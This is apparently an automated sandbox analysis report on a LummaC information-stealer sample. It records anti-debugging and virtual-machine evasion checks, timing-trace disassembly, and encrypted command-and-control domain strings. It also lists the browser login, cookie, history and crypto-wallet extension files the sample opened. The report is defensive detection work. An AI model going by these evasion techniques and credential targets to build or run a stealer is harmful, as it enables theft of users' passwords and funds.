            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0DC9 second address: 47B0DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0DCD second address: 47B0E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007FAD40FD676Bh 0x00000015 sbb al, 0000000Eh 0x00000018 jmp 00007FAD40FD6779h 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov dh, ECh 0x00000021 popad 0x00000022 cmp dword ptr [75C7459Ch], 05h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0E24 second address: 47B0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0E28 second address: 47B0E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0E3D second address: 47B0E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47B0E4D second address: 47B0E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FADB2434310h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAD40FD676Ah 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C001B second address: 47C0082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00D9FE89h 0x0000000e jmp 00007FAD40FC0C67h 0x00000013 xor dword ptr [esp], 751F62A1h 0x0000001a pushad 0x0000001b movzx eax, bx 0x0000001e mov si, dx 0x00000021 popad 0x00000022 call 00007FADB2416765h 0x00000027 push 75C12B70h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov eax, dword ptr [esp+10h] 0x00000037 mov dword ptr [esp+10h], ebp 0x0000003b lea ebp, dword ptr [esp+10h] 0x0000003f sub esp, eax 0x00000041 push ebx 0x00000042 push esi 0x00000043 push edi 0x00000044 mov eax, dword ptr [75C74538h] 0x00000049 xor dword ptr [ebp-04h], eax 0x0000004c xor eax, ebp 0x0000004e push eax 0x0000004f mov dword ptr [ebp-18h], esp 0x00000052 push dword ptr [ebp-08h] 0x00000055 mov eax, dword ptr [ebp-04h] 0x00000058 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005f mov dword ptr [ebp-08h], eax 0x00000062 lea eax, dword ptr [ebp-10h] 0x00000065 mov dword ptr fs:[00000000h], eax 0x0000006b ret 0x0000006c jmp 00007FAD40FC0C63h 0x00000071 sub esi, esi 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 mov esi, edx 0x00000078 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0082 second address: 47C00EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAD40FD6777h 0x00000008 adc cx, 160Eh 0x0000000d jmp 00007FAD40FD6779h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 call 00007FAD40FD6770h 0x0000001a push eax 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d popad 0x0000001e mov dword ptr [ebp-1Ch], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FAD40FD6778h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C00EE second address: 47C0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0100 second address: 47C0104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0159 second address: 47C015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C015F second address: 47C0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47C0163 second address: 47C0167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0799 second address: 47D079D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D079D second address: 47D07A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D07A3 second address: 47D07B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6771h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D07B8 second address: 47D0822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FAD40FC0C5Eh 0x00000011 push eax 0x00000012 jmp 00007FAD40FC0C5Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FAD40FC0C66h 0x0000001d mov ebp, esp 0x0000001f jmp 00007FAD40FC0C60h 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FAD40FC0C5Ah 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0822 second address: 47D0831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0831 second address: 47D0849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C64h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0849 second address: 47D0884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAD40FD6779h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAD40FD676Dh 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0884 second address: 47D0905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAD40FC0C5Dh 0x0000000b jmp 00007FAD40FC0C5Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov esi, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 mov bx, 5C26h 0x0000001c popad 0x0000001d test esi, esi 0x0000001f pushad 0x00000020 mov di, C9FEh 0x00000024 mov cx, dx 0x00000027 popad 0x00000028 je 00007FADB23FE753h 0x0000002e jmp 00007FAD40FC0C61h 0x00000033 cmp dword ptr [75C7459Ch], 05h 0x0000003a jmp 00007FAD40FC0C5Eh 0x0000003f je 00007FADB2416807h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FAD40FC0C67h 0x0000004c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0905 second address: 47D090B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0964 second address: 47D09A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6805B53Ah 0x00000008 pushfd 0x00000009 jmp 00007FAD40FC0C5Bh 0x0000000e and eax, 4F4D54DEh 0x00000014 jmp 00007FAD40FC0C69h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D09A2 second address: 47D09A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D09A6 second address: 47D09AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D09AC second address: 47D09DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FAD40FD676Ch 0x0000000b jmp 00007FAD40FD6775h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D09DD second address: 47D09E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, bx 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D09E5 second address: 47D09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6771h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0A50 second address: 47D0A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Eh 0x00000009 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89EE4E instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89EF3A instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A38D56 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89C042 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A6075B instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AC6632 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7516Thread sleep time: -38019s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7492Thread sleep time: -34017s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7588Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7496Thread sleep time: -30015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 7604Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
            Source: file.exe, 00000000.00000002.2087096479.0000000000A18000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB]
            Source: file.exe, 00000000.00000002.2086588158.000000000061E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: file.exe, 00000000.00000002.2086588158.0000000000689000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000002.2087096479.0000000000A18000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scriptyprefej.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: navygenerayk.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: founpiuer.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacedmny.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: thumbystriw.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: fadehairucw.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crisiwarny.store
            Source: file.exe, 00000000.00000002.2086933404.0000000000841000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: presticitpo.store
            Source: file.exe, 00000000.00000002.2087218688.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: hVProgram Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786198846.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: file.exe, 00000000.00000003.1711943208.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: file.exe, 00000000.00000003.1759504221.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
            Source: file.exe, 00000000.00000003.1759158197.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1759504221.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
